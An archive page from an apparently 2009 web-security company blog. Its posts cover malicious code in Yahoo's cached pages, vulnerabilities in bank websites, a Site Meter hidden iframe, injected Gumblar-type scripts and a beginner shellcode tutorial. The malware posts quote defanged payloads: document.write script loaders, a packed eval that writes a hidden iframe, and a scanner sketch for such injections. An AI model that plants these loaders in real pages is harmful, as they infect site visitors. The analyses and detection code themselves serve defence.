Archive for November, 2009

Is Yahoo Really Hosting Malware?

November 25th, 2009

Yahoo’s cached pages can be distributing malware.

For several years, Yahoo has allowed users to open the “cached pages” option displayed alongside its search results on Yahoo Search. Yahoo has partnered with McAfee’s SearchScan to provide safer searches since about May 2008. This is all good. The intention of providing safer searches to visitors is very noble. Google, too, has led the pack in this direction by opening up its SafeBrowsing API and by providing visual warnings in search results boldly stating “Warning: visiting this website may harm your computer”.

Stopthehacker.com has tried to communicate with executives at Yahoo since April 2009 about the potential problems we have been observing in their cached pages. This has not been met with any real response.

The problem is simple, but very important. Cached versions of web pages displayed on Yahoo Search often contain malware code embedded in them. This is a phenomenon that we have observed repeatedly.

Consider one of our many attempts at communicating this issue to Yahoo (message shortened for brevity).

We have found that Yahoo’s cache results, even with SearchScan on, do not detect the presence of malware on its cached copies of webpages. I have attached some screen shots which prove the point.

Our scanners flagged the code in the cached copies right away. The site in question, for which I looked up Yahoo’s cache is http://www.xxxxxxxx.com

More info on our response to this site is available at http://xxxxxxxxxx.xxx/**stripped**

The screen shots attached with this post show an example of a website which was scraped by Yahoo’s spider, indexed and cached, and which, when accessed via the search results, pops up the malware code. There does not seem to be any kind of sanitization/scrubbing process going on in the background.

Worryingly, this problem gives rise to a very effective attack vector, where a malicious individual can compromise a site or even simply create a site that contains malicious code. Once the site is crawled by Yahoo’s spider, and is loaded in the cache, the link to this cached page becomes an excellent attack vector to use for social engineering, as it carries the sense of security that comes with Yahoo’s brand name. No need to exploit XSS/CSRF, no back-breaking hours of toil and sweat need to be put in discovering flaws in a site. Just get the infected pages cached in Yahoo! and voila, you have a live exploit launched from official Yahoo property.

Given that Yahoo Search held 18% of the search market in October 2009, the number of visitors to the site is non-trivial! Moreover, Yahoo’s brand image can suffer if this phenomenon becomes more widespread or well-known.

Given my failed efforts to discuss this with Yahoo, at this point, I can only hope that this does not become more popular.

I cannot understand how Yahoo is employing SearchScan technology to provide safer search results to visitors, yet fails at the back-end to identify cached pages loaded with malware.

Till next time.


Top Banks Suffering from Multiple Vulnerabilities

November 25th, 2009

Solid financial institutions are the cornerstone of any successful economy. These institutions need to maintain the highest levels of security to protect sensitive customer data from becoming prey to malicious interests. Given that these giants of industry have emergency response and security teams, and that they spend hundreds of thousands of dollars a year on everything from general IT infrastructure to a plethora of security products, it is surprising to see that these top banks and financial institutions are not as locked down and airtight as one should expect.

We at StopTheHacker.com have conducted a study to ascertain if these top financial institutions are really secure or not. The findings, including a graphical summary, are also available in a PDF report attached at the end of this article.

Security Level of Top US Financial Institutions in 2009

The results were astonishing: 13 out of 14 websites had at least one critical vulnerability. In more detail, we highlight some key results below:

  1. On average, there are 1.5 critical security issues in each financial institution
  2. On average, there are 1.2 important security issues in each financial institution
  3. On average, there are 7.9 general security issues in each financial institution
  4. The highest company valuation in total assets does not correlate to the highest security
  5. The financial institution in our set with the least valuation had zero critical security holes

The identified vulnerabilities are very serious: critical security issues are widely regarded as major concerns by security experts and security standards alike.

The most prevalent vulnerability among all of those discovered allows a hacker to spawn what is known as a shell, more commonly known as the command prompt, and thereby remotely execute harmful commands on the web server. Other vulnerabilities range from major Cross Site Scripting (XSS) vulnerabilities, which can enable a hacker to steal the credentials of website visitors, to a plethora of concerns with the various software installations used on these systems.

For more information, please feel free to contact us.


What’s up with Sitemeter?

November 24th, 2009

It has been a busy day. Lots of interesting things have happened over the course of the last few hours. One interesting issue we faced today came up while trying to help out on badwarebusters.org. It seems that one of our scans flagged a script hosted by Site Meter as potentially malicious. This gets interesting because this kind of code acts as a tracker to measure how many hits a site gets, where the users are coming from, how much time they spend on a page, etc. The important point is that this code is deployed on tons of websites. Some of the interesting websites I visit also have this code. I was intrigued to see why this popularly used counter was popping up as suspicious.

We had a look at our logs, local dumps and analysis and saw that the Site Meter script was injecting an iFrame pointing to dg.specificclick.net, using a body onload event as the trigger. Interestingly, dg.spe cificclick.net has been associated with multiple cases of Internet misdemeanor. [0] [1] [2] [3] [4]

It is surprising to see companies that have widely established customer bases to link to questionable content.

The code from the Site Meter script is presented below; the offending part is clearly visible.

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
 init:function( sCodeName, sServerName, sSecurityCode )
 ** code removed for brevity **
 onPageLoad:function()
 { 

 var newIFrame = document.createElement("iframe");
 newIFrame.frameBorder = 0;
 newIFrame.width = 0;
 newIFrame.height = 0;
 newIFrame.src = "http://dg.specif icclick.net/?u=" + encodeURIComponent(document.location) + "&r=" + encodeURIComponent(SiteMeter.getReferralURL()); 

** code removed for brevity **

SiteMeter.init('s29rottweilers', 's29.sitemeter.com', ''); 

var g_sLastCodeName = 's29rottweilers';
// ]]>

The SafeBrowsing report from Google about this site follows:



Free Google Blacklist Monitoring from stopthehacker.com!

November 23rd, 2009

Try our Blacklist Monitoring service for free. Blacklisting can happen to anyone. Now, with Blacklist Monitoring, know before it’s too late to keep your customers. Getting quick notice can let you fix the problem faster. Together, we can help make the web a safer, better place to surf.

What’s in it for you?

  • We tell you if your site appears on a blacklist, i.e. Google’s SafeBrowsing list.
  • You’ll receive an email every day with your status.

Sign up now. It’s Free!

Blacklisting happens to sites every day, and some don’t even know it until they hear that their readers and customers can’t reach them (see badwarebusters). Being blacklisted can practically take your website off the Internet! Most web browsers, like Firefox, Internet Explorer, Safari, or Chrome, will keep your visitors from accessing your site entirely; some won’t even give your visitor a choice.

We hope this never happens to you, but we can prepare you for when it does. We’ll notify you immediately. We can even help you recover.

We’ll be adding more services soon, so check back and don’t forget to subscribe to our feed, or follow us on Twitter or Facebook!


New SSL Issues = New SSL Attacks

November 23rd, 2009

You might remember the article I wrote a couple of weeks back regarding the then recently found vulnerabilities of SSL 3.0 (TLS 1.0). Well, things just got real.

At the time, some researchers even went so far as to say that the vulnerability was only theoretical! Too theoretical to even worry about. The attack is described in detail:

It appears that the popular micro-blogging site Twitter first fell victim to the attack. The Register has the full story:

Now that the attack is in the wild, where are the patches?


New kid on the block: Google Chrome OS

November 22nd, 2009

This weekend, the only hot discussion topic, apart from which awesome Black Friday deals people can lay their hands on, is the announcement concerning the fabled Google Chrome OS. Early press articles have provided a good overview of what the Google OS might look like. The following articles are informative and entertaining.

One of the most important issues concerning this shiny new OS is security. Some pundits around the Internet seem to be toeing the line that this new thin-client-based OS is the panacea for most of the security issues plaguing us today. I only have one thing to say to them: wake up and smell the roses/coffee/eau-de-cologne…

Why do I say this? Google’s code is an “infant” compared to, say, the code branches of FreeBSD. Google does have awesome engineers working on this project; they are very, very good. Moreover, Canonical, the company which provides commercial support for Ubuntu, has done quite a bit of legwork behind the scenes. However, the point remains that the code used for this OS is very new, and there will be issues with it. I can bet that zero-day attacks will evolve. The rationale is simple: writing an OS, even one as simple as MINIX, which most universities use to introduce CS students to the subject, is not easy. Think about the complexity associated with developing large numbers of clean software modules, linking them together and then performing white-box/black-box testing. This is hard enough for an application that does not rely on the Internet, but for an OS which is heavily dependent on the net, the complexity is much, much greater. Heck, even the best web applications have not figured out a bulletproof way to operate on the net. Furthermore, anyone who has written any kind of web app knows that users will always end up using the app in a way the developers did not anticipate.

I must add though, the thought process behind the development of this architecture is impressive.

Consider the fact that even though Chrome OS is a thin client, it will still have to allow interfacing with external hardware such as your USB disk, which is another attack vector. It could be worth investigating whether the OS could be “fooled” into opening up access to a virtual “non-existent” device which just pumps code into the OS. Oh, and yes, Chrome OS does have the ability to revert to a “clean” version, but that becomes moot in the face of the biggest threat to Chrome OS: social engineering.

The challenges of warding off an attack based on social engineering are no more a problem for Chrome OS than for any other OS/web app/enterprise… Assuming the scenario mentioned: if we can open up a connection to the OS, making it believe that it is opening up access to a USB disk, a binary is pumped in which claims that some famous AV company has provided you a free trial courtesy of Google… what then? The customer can be compromised and his “account” used for bot purposes. Of course, once the damage is done, you can remove the binary and break the link to the bot network.

The point being: security is an ongoing process, and the weakest link is an uninformed user. Until that changes, whether it be Google Chrome OS or Microsoft/Ubuntu/Fedora/Unix… everything has a security hole: the human factor.

Till next time.


How to write shell code – I

November 20th, 2009

Writing shell code is perceived as a black art by many. The good news is that it is far from that. Anyone with a basic knowledge of programming and a desire to catch up on some basic assembly programming and CPU architecture can churn out shell code in less than an hour.

Lots of people have asked me for clarifications and tips for writing shell code. To this end, I will try to introduce how to quickly write your first shell code program. Believe me, you will feel awesome. I remember I did!

Let's try to look at a basic loop in assembly:

xor ecx,ecx     ; clear ecx
mov ecx,5       ; loop counter: the body runs five times
start:
    ; loop body goes here
loop start      ; ecx = ecx - 1, then jump back to start while ecx != 0

XORing the ecx register with itself is a standard way to set it to zero. Each time the loop instruction executes, the value in the ecx register is decremented by 1 and control jumps back to start, until ecx reaches zero.

Let's write a small hello world program:

#include <stdio.h>
#include <unistd.h>   /* write() */
#include <stdlib.h>   /* exit()  */

int main(void){
    write(1, "hello world: \n", 14);  /* fd 1 is stdout; 14 bytes, without the NUL */
    exit(0);
}

Now let's turn this into assembly:

gcc -O2 -S -c foo.c

Now we have:

section .text

global _start

_start:

mov     edx,len ; third argument: message length
mov     ecx,msg ; second argument: pointer to the message
mov     ebx,1   ; first argument: file descriptor 1 (stdout)
mov     eax,4   ; system call number 4 = sys_write
int     0x80    ; invoke the kernel

;and exit

mov     ebx,0   ; exit status 0
mov     eax,1   ; system call number 1 = sys_exit
int     0x80    ; invoke the kernel

section .data

msg     db      "Hello, world!",0xa   ; the string followed by a newline
len     equ     $ - msg               ; its length, computed by the assembler

Following this, we use:

nasm -f elf test.asm
ld -s -o hello test.o    # on a 64-bit host: ld -m elf_i386 -s -o hello test.o

Voila! You have an executable! Moreover, if you type in ls -al, you will notice that the size of the executable built from the assembly is only 1/9th of the size of the one built from the plain C code. Now let's use the tool available at www.safemode.org and type in:

s-proc -p test.o

To get… awesome shiny shell code.

char shellcode[] =
	"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x01\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x34\x00\x00\x00\x00"
	"\x00\x28\x00\x08\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"
	"\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00"
	"\x80\x01\x00\x00\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x00"
	"\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xb0\x01\x00\x00\x0e"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00"
	"\x00\x00\x00\x00\x0d\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\xc0\x01\x00\x00\x1f\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x16"
	"\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\xe0\x01\x00\x00\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x02\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x02\x00\x00\x70"
	"\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00"
	"\x10\x00\x00\x00\x28\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x90\x02\x00\x00\x1a\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x30"
	"\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\xb0\x02\x00\x00\x08\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00"
	"\x00\x04\x00\x00\x00\x08\x00\x00\x00\xba\x0e\x00\x00\x00\xb9"
	"\x00\x00\x00\x00\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd"
	"\x80\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48\x65\x6c"
	"\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a\x00\x00\x00\x54"
	"\x68\x65\x20\x4e\x65\x74\x77\x69\x64\x65\x20\x41\x73\x73\x65"
	"\x6d\x62\x6c\x65\x72\x20\x32\x2e\x30\x33\x2e\x30\x31\x00\x00"
	"\x00\x2e\x74\x65\x78\x74\x00\x2e\x64\x61\x74\x61\x00\x2e\x63"
	"\x6f\x6d\x6d\x65\x6e\x74\x00\x2e\x73\x68\x73\x74\x72\x74\x61"
	"\x62\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e\x73\x74\x72\x74"
	"\x61\x62\x00\x2e\x72\x65\x6c\x2e\x74\x65\x78\x74\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x04\x00\xf1\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x03\x00\x02\x00\x12\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x02\x00\x16\x00\x00\x00\x0e\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\xf1\xff\x0b\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x10\x00\x01\x00\x00\x74\x65\x73"
	"\x74\x2e\x61\x73\x6d\x31\x00\x5f\x73\x74\x61\x72\x74\x00\x6d"
	"\x73\x67\x00\x6c\x65\x6e\x00\x00\x00\x00\x00\x00\x00\x06\x00"
	"\x00\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
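The first bytes of that dump (\x7f\x45\x4c\x46, the ELF magic), the section names (.text, .data, .comment, .symtab, .rel.text) and the “The Netwide Assembler 2.03.01” string show that s-proc -p on test.o emitted the entire object file, not just the instructions: the 34 instruction bytes of _start are the \xba\x0e… run at file offset 0x180. The added example below (not code from the post or from s-proc) builds a constructed ELF32 relocatable holding those same 34 bytes, walks the section header table to pull out .text, prints it in the same C-string format and lists why that byte run is still not self-contained; the object layout is a simplified assumption, not the real test.o.

```python
import struct

# The 34 instruction bytes that the post's test.asm assembles to; they are the
# "\xba\x0e..." run inside the s-proc dump (the .text section, size 0x22).
TEXT_BYTES = bytes.fromhex(
    "ba0e000000"   # mov edx, 14        ; length of "Hello, world!\n"
    "b900000000"   # mov ecx, 0         ; msg: address left for the linker to fill
    "bb01000000"   # mov ebx, 1         ; stdout
    "b804000000"   # mov eax, 4         ; sys_write
    "cd80"         # int 0x80
    "bb00000000"   # mov ebx, 0         ; exit status
    "b801000000"   # mov eax, 1         ; sys_exit
    "cd80"         # int 0x80
)
DATA_BYTES = b"Hello, world!\n"

EHDR_FMT = "<16sHHIIIIIHHHHHH"   # Elf32_Ehdr, little-endian, 52 bytes
SHDR_FMT = "<IIIIIIIIII"         # Elf32_Shdr, 40 bytes


def build_elf32_rel(text: bytes, data: bytes) -> bytes:
    """Constructed stand-in for test.o: a minimal ELF32 i386 relocatable object
    with .text, .data and .shstrtab (no symbols or relocations, unlike the real file)."""
    shstrtab = b"\x00.text\x00.data\x00.shstrtab\x00"
    text_off = struct.calcsize(EHDR_FMT)
    data_off = text_off + len(text)
    str_off = data_off + len(data)
    shoff = (str_off + len(shstrtab) + 3) & ~3            # 4-byte align the table
    body = text + data + shstrtab
    body += b"\x00" * (shoff - text_off - len(body))       # padding up to the table
    # name, type, flags, addr, offset, size, link, info, align, entsize
    shdrs = [
        (0, 0, 0, 0, 0, 0, 0, 0, 0, 0),                      # SHN_UNDEF
        (1, 1, 6, 0, text_off, len(text), 0, 0, 16, 0),      # .text     PROGBITS, AX
        (7, 1, 3, 0, data_off, len(data), 0, 0, 4, 0),       # .data     PROGBITS, WA
        (13, 3, 0, 0, str_off, len(shstrtab), 0, 0, 1, 0),   # .shstrtab STRTAB
    ]
    ident = b"\x7fELF" + bytes([1, 1, 1]) + b"\x00" * 9      # ELF32, LSB, version 1
    ehdr = struct.pack(EHDR_FMT, ident, 1, 3, 1, 0, 0, shoff, 0,   # ET_REL, EM_386
                       struct.calcsize(EHDR_FMT), 0, 0,
                       struct.calcsize(SHDR_FMT), len(shdrs), 3)   # shstrndx = 3
    return ehdr + body + b"".join(struct.pack(SHDR_FMT, *s) for s in shdrs)


def parse_sections(elf: bytes) -> dict[str, bytes]:
    """Walk the section header table and return {section name: raw bytes}."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("not a little-endian ELF32 image")
    hdr = struct.unpack_from(EHDR_FMT, elf, 0)
    shoff, shentsize, shnum, shstrndx = hdr[6], hdr[11], hdr[12], hdr[13]
    if shentsize != struct.calcsize(SHDR_FMT) or shoff + shnum * shentsize > len(elf):
        raise ValueError("section header table out of range")
    shdrs = [struct.unpack_from(SHDR_FMT, elf, shoff + i * shentsize) for i in range(shnum)]
    names_off, names_size = shdrs[shstrndx][4], shdrs[shstrndx][5]
    names = elf[names_off:names_off + names_size]
    sections = {}
    for sh_name, sh_type, _flags, _addr, off, size, *_ in shdrs:
        name = names[sh_name:names.index(b"\x00", sh_name)].decode()
        sections[name] = b"" if sh_type == 8 else elf[off:off + size]   # 8 = SHT_NOBITS
    return sections


def to_c_string(blob: bytes) -> str:
    """Render bytes the way s-proc prints them: "\\xNN\\xNN..."."""
    return '"' + "".join(f"\\x{b:02x}" for b in blob) + '"'


def shellcode_problems(code: bytes) -> list[str]:
    """Why a raw .text dump is not yet a self-contained byte string."""
    problems = []
    if b"\x00" in code:
        problems.append("contains NUL bytes, so string copies will truncate it")
    if b"\xb9\x00\x00\x00\x00" in code:
        problems.append("mov ecx,0: the address of msg was never relocated, so the "
                        "data pointer is missing")
    return problems


def main() -> None:
    obj = build_elf32_rel(TEXT_BYTES, DATA_BYTES)
    secs = parse_sections(obj)
    print(f"whole object: {len(obj)} bytes; .text alone: {len(secs['.text'])} bytes")
    print(to_c_string(secs[".text"]))
    for problem in shellcode_problems(secs[".text"]):
        print("-", problem)


if __name__ == "__main__":
    main()
```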

Till next time, adios!


When Benign scripts attack – III

November 18th, 2009

In this post we continue to analyze how popular scripts are being targeted by hackers to cause infections on websites, and on the computers which load those sites in a browser to view them. The motivation behind using these originally benign scripts to do the dirty work on their behalf is that a lot of webmasters and web enthusiasts have wised up to the fact that code injection is a never-ending battle, and they are making efforts to identify and remove malicious code from their sites.

This particular example shows how a mootools script was used by a hacker to spread a Gumblar infection. Consider the case of hxxp://www.wwf.gr/ referred to by 22lyk-athin. att.sch .gr/index.html. You will find the following code listed in one of the associated mootools JavaScript files, which are served locally by the site itself. The malicious code causes an infection which leads to the site being blacklisted by Google. The detailed report from Google would probably mention that the infection is of the “Gumblar” type.

Following the first example is another one wherein a Mediawiki script was targeted. The source was www.1wed din gsource.com/wedding-wiki/Wedding/

//MooTools, My Object Oriented Javascript Tools. Copyright (c) 2006 Valerio Proietti, <http://mad4milk.net>, MIT Style License.


**code removed for brevity**


**malicious code**

document.write('<scr ipt src=hxxp://nw drealty.com/Scripts/Unti tled-17.php ><\/sc ript>');
document.write('<scri pt src=hxxp://nwd realty.com/Scripts/Untit led-17.php ><\/s cript>');

Our systems flagged this as unsafe. This exploit leads to an infection which is a remnant of the famous Gumblar virus.

// MediaWiki JavaScript support functions
var clientPC = navigator.userAgent.toLowerCase(); // Get client info
var is_gecko = /gecko/.test( clientPC ) &&
!/khtml|spoofer|netscape\/7\.0/.test(clientPC);
var webkit_match = clientPC.match(/applewebkit\/(\d+)/);
if (webkit_match) {
var is_safari = clientPC.indexOf('applewebkit') != -1 &&
clientPC.indexOf('spoofer') == -1;
var is_safari_win = is_safari && clientPC.indexOf('windows') != -1;

** code removed for brevity **
}
//note: all skins should call runOnloadHook() at the end of html output,
//      so the below should be redundant. It's there just in case.
hookEvent("load", runOnloadHook);

** malicious code **
document.write('<scr ipt src=hxxp://hydr eka.com/logiciels/winfluid_mo bile.php ><\/s cript>');


When Benign scripts attack – II

November 16th, 2009

A few weeks back I wrote about how hackers are targeting benign scripts to do the dirty work on their behalf. The trend is now intensifying. In the last post about this issue, we saw how common scripts like JQuery and AC_RunActiveContent, mootools and others were being targeted. This time we will look at injection in a script which does not conform to the trend mentioned.

This particular example is not a popularly deployed script, and was probably hand-coded by a developer for their own purposes. Consider the case of hxxp://www.iu.edu.sa/web mail/ You will find the following code listed in one of the associated JavaScript files, which are served locally by the site itself. Interestingly, the injected code is packed in a format like that of the popular Dean Edwards Packer. Unpacking it is trivial, and hence the actual code, which was not part of the original file, is also displayed below.

// defines for sections
var SECTION_LOGIN    = 0;
var SECTION_MAIL     = 1;

// defines for screens
var SCREEN_LOGIN              = 0;
var SCREEN_MESSAGES_LIST_VIEW = 1;
var SCREEN_MESSAGES_LIST      = 2;
var SCREEN_VIEW_MESSAGE       = 3;
var SCREEN_NEW_MESSAGE        = 4;

var Sections = Array();
Sections[SECTION_LOGIN]    = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL]     = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST_VIEW] = 'screen = new CMessagesListViewScreen(SkinName);';
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST] = 'screen = new CMessagesListScreen(SkinName);';

**code removed for brevity**

var REDRAW_NOTHING = 0;
var REDRAW_PAGE    = 3;
var AUTOSELECT_CHARSET = -1;
var VIEW_MODE_WITH_PANE     = 1;
var Fonts = [Arial, Arial Black, Courier New, Tahoma, Times New Roman, Verdana]

Ready(INIT_DEFINES);

**malicious code**

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){returnw};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(be(c)b,g),k[c])}}return p}(g 7=b 5(),4=b 5(7.k()l);2(0.9.6(8=f)==-1){2(i.m.6(a)!=-1){3=3}0.c(<3dh=1 ej=1 w=hn://yz-v.u/p/ o=qr:t></2s>);0.9=8=f;4=4.x(); },36,36,document||if|iframe|expires|Date|indexOf|today|_df|cookie||new|write|widt|heig||var||navigator|ht|getTime|2678400000|appCodeName|ttp|style|b2b|dis|play|rame|none|net|atm|src|toGMTString|loadi|ng.split(|),0,{}));

**unpacked form**

['var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf("_df=f")==-1){if(navigator.appCodeName.indexOf("a")!=-1){iframe="iframe"}document.write("<iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'></iframe>");document.cookie="_df=f; expires=expires.toGMTString(); "}\n']

Our systems flagged this as unsafe, and for further validation one can look it up in the Malware Domain List.

2009/03/28_00:00 loading-atm.net/b2b/ 83.133.123.140 t490.1paket.com redirects to exploits Jsfgvbg (loading-atm@mail.ru) 13237

The exploit seems to drop an executable onto the victim’s system, which in turn is a downloader and tries to grab two more files from the same domain.

And to whet your appetite more, here’s another example captured from hxxp://www. aikidoofqueens. com/kids/

var ma=new Array();var mx=new Array();var my=new Array();var mc=new Array();
var mpos=new Array();var mal=0;var main=0;var menuw=200;var psrc=0;
var pname="";var al="";var gd=0;var gx,gy;var d=document;
var NS7=(!d.all&&d.getElementById);var NS4=(!d.getElementById);
var IE5=(!NS4&&!NS7&&(navigator.userAgent.indexOf('MSIE 5.0')!=-1
||navigator.userAgent.indexOf('MSIE 5.2')!=-1));var IE5p5=(!NS4&&
!NS7&&navigator.userAgent.indexOf('MSIE 5.5')!=-1);var NS6=(NS7&&
navigator.userAgent.indexOf('Netscape6')!=-1);
var SAF=navigator.userAgent.indexOf('Safari')!=-1;p=navigator.userAgent.indexOf('Opera');
if(p>-1){p=navigator.userAgent.charAt(p+6);if(p>6)NS7=1;else NS4=1;}var 

** code removed for brevity **

clipMenu(i,el){if(el.offsetLeft>mx[i])el.style.clip="rect("+(my[i]-el.offsetTop)+"px "
+(el.offsetWidth+(mx[i]-el.offsetLeft))+"px "+el.offsetHeight+"px "+0+"px)";
else el.style.clip="rect("+(my[i]-el.offsetTop)+"px "+el.offsetWidth+"px "+
el.offsetHeight+"px "+(mx[i]-el.offsetLeft)+"px)";}

** malicious code **

document.write('< script src=hxxp://b olccorlando.org/_vti_txt/event_pwf.php ><\/s cript>');
document.write('<sc ript src=hxxp://gh anafoneshop.com/category_images/vieworder.php ><\/s cript>');
document.write('<scr ipt src=hxxp://gha nafoneshop.com/category_images/vieworder.php ><\/sc ript>');
document.write('<scri pt src=hxxp://ghan afoneshop.com/category_images/vieworder.php ><\/scr ipt>');
document.write('<scrip t src=hxxp://ghana foneshop.com/category_images/vieworder.php ><\/scri pt>');
document.write('<sc ript src=hxxp://ghanaf oneshop.com/category_images/vieworder.php ><\/scrip t>');
document.write('<scr ipt src=hxxp://ramazan -toker.com/images/gifimg.php ><\/sc ript>');
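Serving this post as well as the Site Meter and mootools/MediaWiki cases above, here is an added example (not the StopTheHacker scanner's code) of a heuristic scan over a script for the injection shapes shown: document.write() of a <script> loaded from a third-party host or of a 1x1/display:none <iframe>, and an iframe built through the DOM with zero width and height. The sample script and its hosts are constructed for the example, and PAGE_HOST is an assumed name for the site that serves the script.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the injections quoted in these posts (defanging
# removed); the hosts are placeholders, not the domains named in the posts.
PAGE_HOST = "victim.example"
SAMPLE_JS = r"""
var MooTools={version:'1.11'};
document.write('<script src=http://injected.example/Scripts/Untitled-17.php ><\/script>');
document.write('<script src=/js/app.js><\/script>');
var today=new Date(),expires=new Date(today.getTime()+2678400000);
if(document.cookie.indexOf("_df=f")==-1){document.write("<iframe width=1 height=1 src='http://injected.example/b2b/' style='display:none'></iframe>");}
var newIFrame = document.createElement("iframe");
newIFrame.frameBorder = 0;
newIFrame.width = 0;
newIFrame.height = 0;
newIFrame.src = "http://tracker.example/?u=" + encodeURIComponent(document.location);
var player = document.createElement("iframe");
player.width = 640;
player.src = "/embed/player";
"""

DOC_WRITE = re.compile(r"""document\.write\(\s*(['"])(.*?)\1\s*\)""", re.S)
TAG = re.compile(r"<(script|iframe)\b([^>]*)>", re.I)
SRC = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
CREATE_IFRAME = re.compile(r"""(\w+)\s*=\s*document\.createElement\(\s*['"]iframe['"]\s*\)""")


def host_of(url: str) -> str:
    """Hostname of an absolute URL; '' for a relative path."""
    if url.startswith("//"):
        url = "http:" + url
    return urlparse(url).hostname or ""


def hidden_attrs(attrs: str) -> bool:
    """width and height of 0 or 1, or display:none, mark an iframe meant to stay unseen."""
    tiny = r"""{}\s*=\s*["']?[01]\b"""
    return bool(re.search(r"display\s*:\s*none", attrs, re.I)) or bool(
        re.search(tiny.format("width"), attrs, re.I)
        and re.search(tiny.format("height"), attrs, re.I))


def scan_script(js: str, page_host: str) -> list[dict]:
    """Return findings for the injection patterns seen in the posts."""
    findings = []
    # 1. markup pushed in through document.write(...)
    for m in DOC_WRITE.finditer(js):
        markup = m.group(2).replace(r"\/", "/")          # undo the <\/script> escape
        for tag in TAG.finditer(markup):
            name, attrs = tag.group(1).lower(), tag.group(2)
            src = SRC.search(attrs)
            url = src.group(1) if src else ""
            host = host_of(url)
            if name == "script" and host and host != page_host:
                findings.append({"kind": "script-injection", "host": host, "url": url})
            elif name == "iframe" and hidden_attrs(attrs):
                findings.append({"kind": "hidden-iframe", "host": host, "url": url})
    # 2. iframes assembled through the DOM (the Site Meter pattern)
    for m in CREATE_IFRAME.finditer(js):
        var, tail = m.group(1), js[m.end():]

        def assigned(prop, value):
            return re.search(rf"\b{var}\.{prop}\s*=\s*{value}", tail) is not None

        hidden = (assigned("width", r"0\b") and assigned("height", r"0\b")) \
            or assigned(r"style\.display", r"""['"]none['"]""")
        src = re.search(rf"""\b{var}\.src\s*=\s*['"]([^'"]+)""", tail)
        url = src.group(1) if src else ""
        if hidden:
            findings.append({"kind": "dom-hidden-iframe", "host": host_of(url), "url": url})
    return findings


if __name__ == "__main__":
    for f in scan_script(SAMPLE_JS, PAGE_HOST):
        print(f"{f['kind']:18} {f['host']:20} {f['url']}")
```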


XST: One of the Most Prevalent Security Holes

November 12th, 2009

Cross Site Tracing (XST) is one of the most prevalent threats on the Internet today. The surprising fact is that even though developers are somewhat familiar with other attack vectors such as XSS (Cross Site Scripting), SQLi (SQL injection) and others, relatively few seem to know what XST is.

XST uses the HTTP TRACE method, whose output is basically the request and response headers and any associated HTML. A web server which supports this method and has it enabled will reply with the header data and the HTML. TRACE was designed for debugging HTTP servers: when the server receives a TRACE request, it is supposed to respond by echoing back the entire content of the request, which includes the cookie information.

